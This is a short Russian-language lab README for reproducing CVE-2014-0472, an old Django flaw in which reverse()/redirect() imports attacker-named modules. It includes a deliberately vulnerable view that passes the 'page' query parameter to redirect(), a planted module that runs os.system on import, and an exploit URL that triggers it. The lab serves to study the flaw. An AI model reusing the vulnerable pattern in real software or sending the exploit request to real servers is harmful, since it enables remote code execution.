
CVE-2014-0472 Django неожиданное выполнение кода с использованием reverse()
Используйте
docker-compose up -d
Доступ к localhost:8083
Ссылка: https://www.djangoproject.com/weblog/2014/apr/21/security/
- Присутствует одно или несколько представлений, которые конструируют URL на основе пользовательского ввода (обычно параметр "next" в строке запроса, указывающий, куда перенаправить после успешного завершения действия).
- Атакующему известно о существовании на сервере одного или нескольких модулей в пути импорта Python, которые при импорте выполняют код с побочными эффектами.
В tests.py
def evil_function():
print("exploit successful")
os.system("echo > /tmp/`whoami` ")
return os.getuid()
evil = evil_function()
В views.py
def redirect_test(request):
page = request.GET.get('page', None)
if page is not None:
redirect(page)
return HttpResponse("OK")
Используйте функцию перенаправления для вызова вредоносной функции

Используйте эксплойт
http://your-ip:8083/example?page=app.tests.evil

Эксплуатировано
